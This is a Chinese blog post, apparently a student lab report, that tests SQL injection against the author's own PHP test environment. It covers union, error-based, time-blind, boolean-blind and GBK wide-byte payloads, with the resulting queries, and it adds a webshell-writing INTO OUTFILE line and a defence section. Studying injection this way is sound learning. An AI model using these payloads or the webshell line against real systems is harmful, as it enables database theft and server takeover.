<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">

<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>








<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="https://fonts.cat.net/css?family=PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="任务标题：Task Titleweb 安全之手工测试之前编写的注入环境1、手工测试之前搭建的不同注入环境，并记录 sql 语句，最终以获取 mysql 中的用户信息和当前表的信息为目标 2、思考通过注入漏洞可以做什么？ 3、思考注入漏洞如何防御？代码、服务器等角度">
<meta property="og:type" content="article">
<meta property="og:title" content="第十一周：手工测试之前编写的注入环境">
<meta property="og:url" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/index.html">
<meta property="og:site_name" content="Bu1&#39;Blog">
<meta property="og:description" content="任务标题：Task Titleweb 安全之手工测试之前编写的注入环境1、手工测试之前搭建的不同注入环境，并记录 sql 语句，最终以获取 mysql 中的用户信息和当前表的信息为目标 2、思考通过注入漏洞可以做什么？ 3、思考注入漏洞如何防御？代码、服务器等角度">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106105455968.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106110007499.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106110828654.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106111402699.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106112115290.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106112522684.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106112829691.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106113011469.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106143843839.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106144636878.png">
<meta property="og:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106144731073.png">
<meta property="og:updated_time" content="2021-01-06T08:27:46.256Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="第十一周：手工测试之前编写的注入环境">
<meta name="twitter:description" content="任务标题：Task Titleweb 安全之手工测试之前编写的注入环境1、手工测试之前搭建的不同注入环境，并记录 sql 语句，最终以获取 mysql 中的用户信息和当前表的信息为目标 2、思考通过注入漏洞可以做什么？ 3、思考注入漏洞如何防御？代码、服务器等角度">
<meta name="twitter:image" content="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106105455968.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/">





  <title>第十一周：手工测试之前编写的注入环境 | Bu1'Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Bu1'Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">如果能控制粗鄙的狂喜，就不会有深入骨髓的悲伤。</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2021/01/06/第十一周：手工测试之前编写的注入环境/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Bu1">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Bu1'Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">第十一周：手工测试之前编写的注入环境</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-01-06T16:25:54+08:00">
                2021-01-06
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/信安之路/" itemprop="url" rel="index">
                    <span itemprop="name">信安之路</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2021/01/06/第十一周：手工测试之前编写的注入环境/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2021/01/06/第十一周：手工测试之前编写的注入环境/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  2.1k 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">阅读时长 &asymp;</span>
                
                <span title="阅读时长">
                  8 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="任务标题：Task-Titleweb-安全之手工测试之前编写的注入环境"><a href="#任务标题：Task-Titleweb-安全之手工测试之前编写的注入环境" class="headerlink" title="任务标题：Task Titleweb 安全之手工测试之前编写的注入环境"></a>任务标题：Task Titleweb 安全之手工测试之前编写的注入环境</h1><p>1、手工测试之前搭建的不同注入环境，并记录 sql 语句，最终以获取 mysql 中的用户信息和当前表的信息为目标</p>
<p>2、思考通过注入漏洞可以做什么？</p>
<p>3、思考注入漏洞如何防御？代码、服务器等角度</p>
<a id="more"></a>

<p>扩展学习：针对不同的注入漏洞，编写防御代码，具体如何防御自己决定，相关代码均记录在报告中，测试自己的防御代码是否可以绕过，并将过程进行记录</p>
<h1 id="学习报告"><a href="#学习报告" class="headerlink" title="学习报告"></a>学习报告</h1><h2 id="0x01-不同类型的注入最后传递给Mysql的具体语句"><a href="#0x01-不同类型的注入最后传递给Mysql的具体语句" class="headerlink" title="0x01 不同类型的注入最后传递给Mysql的具体语句"></a>0x01 不同类型的注入最后传递给Mysql的具体语句</h2><h3 id="1-回显注入"><a href="#1-回显注入" class="headerlink" title="1. 回显注入"></a>1. 回显注入</h3><p>在源代码中添加一句<code>echo &quot;$sql&quot;;</code>打印出实际上传递给Mysql的sql语句</p>
<ol>
<li><p>查询数据库<code>?id=-1&#39; UNION SELECT 1,2,DATABASE() --+</code></p>
<p>实际上传递的值：</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106105455968.png" alt="image-20210106105455968"></p>
<p>明显可以看到没有做任何的过滤，前一个<code>&#39;</code>闭合了源程序预期输入的id值，然后用union联合语句执行构造的敏感sql语句。 <code>--</code>符合注释掉了源程序中的限制，在mysql中执行一下试试。</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106110007499.png" alt="image-20210106110007499"></p>
<p>成功获取到了输入的数据。</p>
</li>
</ol>
<h3 id="2-报错注入"><a href="#2-报错注入" class="headerlink" title="2. 报错注入"></a>2. 报错注入</h3><p>在源代码中添加一句<code>echo &quot;$sql&quot;;</code>打印出实际上传递给Mysql的sql语句。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;SELECT * FROM users WHERE id=&apos;$id&apos; LIMIT 0,1&quot;;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line">	echo &quot;$sql&quot;;</span><br><span class="line">	echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">	if($row)</span><br><span class="line">	&#123;</span><br><span class="line">  	echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;	</span><br><span class="line">  	echo &apos;You are in...........&apos;;</span><br><span class="line">  	echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">    	echo &quot;&lt;/font&gt;&quot;;</span><br><span class="line">  	&#125;</span><br><span class="line">	else </span><br><span class="line">	&#123;</span><br><span class="line">	</span><br><span class="line">	echo &apos;&lt;font size=&quot;3&quot; color=&quot;#FFFF00&quot;&gt;&apos;;</span><br><span class="line">	print_r(mysql_error());</span><br><span class="line">	echo &quot;&lt;/br&gt;&lt;/font&gt;&quot;;	</span><br><span class="line">	echo &apos;&lt;font color= &quot;#0000ff&quot; font size= 3&gt;&apos;;	</span><br><span class="line">	</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>1.查询数据库<code>?id=1&#39; and extractvalue(1,concat(0x7e,(DATABASE()),0x7e)) --+</code></p>
<p>实际上传递的值:</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106110828654.png" alt="image-20210106110828654"></p>
<p>从代码来看，实际上与回显注入的原理差不多根本原因是没有对用户输入的<code>&#39;</code>进行处理，导致了用户可以输入非预期的内容从而获得敏感的数据，只不过报错注入是利用错误信息回显，在Mysql中执行一下试试。</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106111402699.png" alt="image-20210106111402699"></p>
<p>成功获取到了敏感数据。</p>
<h3 id="3-盲注"><a href="#3-盲注" class="headerlink" title="3. 盲注"></a>3. 盲注</h3><h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><p>在源代码中添加一句<code>echo &quot;$sql&quot;;</code>打印出实际上传递给Mysql的sql语句。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$sql=&quot;SELECT * FROM users WHERE id=&apos;$id&apos; LIMIT 0,1&quot;;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line">	echo &quot;$sql&quot;;</span><br><span class="line">	echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">if($row)</span><br><span class="line">	&#123;</span><br><span class="line">  	echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;	</span><br><span class="line">  	echo &apos;You are in...........&apos;;</span><br><span class="line">  	echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">    	echo &quot;&lt;/font&gt;&quot;;</span><br><span class="line">  	&#125;</span><br><span class="line">	else </span><br><span class="line">	&#123;</span><br><span class="line">	echo &apos;&lt;font size=&quot;5&quot; color=&quot;#FFFF00&quot;&gt;&apos;;</span><br><span class="line">	echo &apos;You are in...........&apos;;</span><br><span class="line">	echo &quot;&lt;/br&gt;&lt;/font&gt;&quot;;	</span><br><span class="line">	echo &apos;&lt;font color= &quot;#0000ff&quot; font size= 3&gt;&apos;;	</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>查询数据库<code>?id=1&#39; and if(length(database()) = 8,1,sleep(5)) --+</code></p>
<p>实际上传递的值：</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106112115290.png" alt="image-20210106112115290"></p>
<p>从代码来看，时间盲注利用页面加载时间来判断后端数据库是否执行了我们构造的sql语句，本质还是没有对对<code>&#39;</code>进行处理，导致了用户可以随意闭合，构造自己需要的sql语句。在mysql中执行试试。</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106112522684.png" alt="image-20210106112522684"></p>
<p>注意执行时间，是<strong>立即返回</strong>的，表明数据库的长度确实是8，因此根据这种信息便可以通过脚本遍历出具体的数值。</p>
<h4 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h4><p>在源代码中添加一句<code>echo &quot;$sql&quot;;</code>打印出实际上传递给Mysql的sql语句。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">$sql=<span class="string">"SELECT * FROM users WHERE id='$id' LIMIT 0,1"</span>;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line"></span><br><span class="line"><span class="comment">// mysql_fetch_array() 函数从结果集中取得一行作为关联数组,或数字数组,或二者兼有 返回根据从结果集取得的行生成的数组,如果没有更多行则返回 false。</span></span><br><span class="line"></span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"$sql"</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">	<span class="keyword">if</span>($row)</span><br><span class="line">	&#123;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'&lt;font size="5" color="#FFFF00"&gt;'</span>;	</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'You are in...........'</span>;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    	<span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;</span><br><span class="line">  	&#125;</span><br><span class="line">	<span class="keyword">else</span> </span><br><span class="line">	&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font size="5" color="#FFFF00"&gt;'</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;&lt;/font&gt;"</span>;	</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font color= "#0000ff" font size= 3&gt;'</span>;	</span><br><span class="line">	</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>查询数据库<code>?id=1&#39; and (ascii(substr((select database()) ,1,1))) = 115--+</code></p>
<p>实际上传递给mysql的值为：</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106112829691.png" alt="image-20210106112829691"></p>
<p>从代码来看，布尔盲注利用页面是否打印”You are in….”来判断后端数据库是否执行了我们构造的sql语句，本质还是没有对对<code>&#39;</code>进行处理，导致了用户可以随意闭合，构造自己需要的sql语句。在mysql中执行试试。</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106113011469.png" alt="image-20210106113011469"></p>
<p>从数据库反应来看，实际上数据库并没有返回任何值，也就是查询结果为空。同时也表明<strong>布尔盲注漏洞一般是前端配置错误，导致了信息输出从而让攻击者可以判断出是否执行成功</strong></p>
<h3 id="4-宽字节注入"><a href="#4-宽字节注入" class="headerlink" title="4. 宽字节注入"></a>4. 宽字节注入</h3><p>在源代码中添加一句<code>echo &quot;$sql&quot;;</code>打印出实际上传递给Mysql的sql语句。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check_addslashes</span><span class="params">($string)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $string = preg_replace(<span class="string">'/'</span>. preg_quote(<span class="string">'\\'</span>) .<span class="string">'/'</span>, <span class="string">"\\\\\\"</span>, $string);          </span><br><span class="line">    $string = preg_replace(<span class="string">'/\'/i'</span>, <span class="string">'\\\''</span>, $string);                               </span><br><span class="line">    $string = preg_replace(<span class="string">'/\"/'</span>, <span class="string">"\\\""</span>, $string);                               </span><br><span class="line">    <span class="keyword">return</span> $string;</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line">mysql_query(<span class="string">"SET NAMES gbk"</span>);</span><br><span class="line"></span><br><span class="line">$sql=<span class="string">"SELECT * FROM users WHERE id='$id' LIMIT 0,1"</span>;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"$sql"</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>查询数据库<code>?id=-1%df&#39; UNION SELECT 1,2,DATABASE() --+</code></p>
<p>实际上传递的值：</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106143843839.png" alt="image-20210106143843839"></p>
<p>从代码来看源代码中对用户输入的反斜杠、单引号、双引号都进行了处理。所以我们不能直接输入单引号双引号进行注入，通查看实际传递的sql语句，我们看到了传入的值变成了一个汉字，这是因为在<strong>GBK</strong>编码中，<code>%df%5c</code>会被转译成繁体汉字<code>連</code>从而绕过注入。看看在mysql中执行的效果。</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106144636878.png" alt="image-20210106144636878"></p>
<p>换成试一下<code>%df%5c</code> ，结果一样。</p>
<p><img src="/2021/01/06/第十一周：手工测试之前编写的注入环境/image-20210106144731073.png" alt="image-20210106144731073"></p>
<h3 id="5-总结"><a href="#5-总结" class="headerlink" title="5. 总结"></a>5. 总结</h3><p>上面那几种类型注入方法原理及利用方法在上一篇文章中已经很详细的说明了，这一篇文章通过和数据库交互来深入理解一下各种注入方法的原理。通过上面的测试，回显注入、报错注入、盲注都是未对用户输入的数据进行处理，完全相信用户的输入的数据，所以导致了用户可以精心构造sql语句进行注入。回显注入则是会把数据库的处理结果直接打印在网页上、报错注入则是程序员将数据库的回显信息隐藏起来了，我们必须借助报错信息进行回显、盲注则是程序进一步将信息隐藏连报错信息都看不到只能通过布尔盲注与时间盲注来判断sql语句的执行情况。宽字节注入本质上也是绕过了对<code>&#39;</code>的限制，借用了各种汉字编码如GBK等来进行绕过。</p>
<p><strong>sql注入就是要想办法绕过各种限制让sql语句执行所以会有宽字节注入，执行后想办法让攻击者感知到执行结果，所以会有回显、报错也会有通过逻辑来判断的盲注。</strong></p>
<h2 id="0x02-注入漏洞的危害"><a href="#0x02-注入漏洞的危害" class="headerlink" title="0x02 注入漏洞的危害"></a>0x02 注入漏洞的危害</h2><p>通过上面的演示操作，我们可以直接获取的数据库的操作权限。通过对数据库进行操作可能导致数据库被拖库，管理员和重要人员的敏感信息泄露，也可以通过SQL注入漏洞来获取webshell或者执行命令导致服务器系统权限被获取等。<code>select &quot;&lt;?php @eval($_POST[&#39;pass&#39;]);?&gt;&quot; INTO OUTFILE &quot;D:\Wamp\webshell.php&quot;</code></p>
<h2 id="0x03-注入漏洞的防御"><a href="#0x03-注入漏洞的防御" class="headerlink" title="0x03 注入漏洞的防御"></a>0x03 注入漏洞的防御</h2><h3 id="1-代码方向"><a href="#1-代码方向" class="headerlink" title="1. 代码方向"></a>1. 代码方向</h3><ol>
<li><p>对用户输入数据进行转义，例如上文中提到的<code>&#39;</code>，示例代码中就屏蔽掉了用户输入的<code>\&#39;&quot;</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check_addslashes</span><span class="params">($string)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $string = preg_replace(<span class="string">'/'</span>. preg_quote(<span class="string">'\\'</span>) .<span class="string">'/'</span>, <span class="string">"\\\\\\"</span>, $string);       </span><br><span class="line">    $string = preg_replace(<span class="string">'/\'/i'</span>, <span class="string">'\\\''</span>, $string);                           </span><br><span class="line">    $string = preg_replace(<span class="string">'/\"/'</span>, <span class="string">"\\\""</span>, $string);                             </span><br><span class="line">    <span class="keyword">return</span> $string;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
<li><p>基于攻击特征的匹配过滤。匹配到关键词则认定为攻击，如可以检测<code>select</code>、<code>from</code>、<code>union</code>等关键词，但是这种方法的误杀率比较高，需要结合实际的情况优化代码。</p>
</li>
<li><p>对数据类型及数据长度进行严格限定，防止用户输入过多的无用数据。</p>
</li>
</ol>
<h3 id="2-服务器方向"><a href="#2-服务器方向" class="headerlink" title="2. 服务器方向"></a>2. 服务器方向</h3><ol>
<li>对数据库采用最小权限分配，这样即使可以拿到权限也不会造成更大的损失。</li>
<li>避免显示SQL执行出错的信息，防止出错信息被利用。</li>
<li>数据层的编码统一，防止过滤模型被绕过。</li>
</ol>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    Bu1
  </li>
<li class="post-copyright-link">
  <strong>本文链接：</strong>
  <a href="http://bu1.github.io/2021/01/06/第十一周：手工测试之前编写的注入环境/" title="第十一周：手工测试之前编写的注入环境">http://bu1.github.io/2021/01/06/第十一周：手工测试之前编写的注入环境/</a>
</li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    
	<div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------END<i class="fa fa-paw"></i>-------------</div>
    
</div>
      
    </div>
    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2021/01/06/第十周：注入代码编写与环境搭建/" rel="next" title="第十周：注入代码编写与环境搭建">
                <i class="fa fa-chevron-left"></i> 第十周：注入代码编写与环境搭建
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>

  
  
  
  
  



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Bu1">
            
              <p class="site-author-name" itemprop="name">Bu1</p>
              <p class="site-description motion-element" itemprop="description">最为惊艳的是思想碰撞产生的火花。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">23</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://tanpuhan.github.io" title="CoCo1er" target="_blank">CoCo1er</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.y1nhui.com" title="y1nhui" target="_blank">y1nhui</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
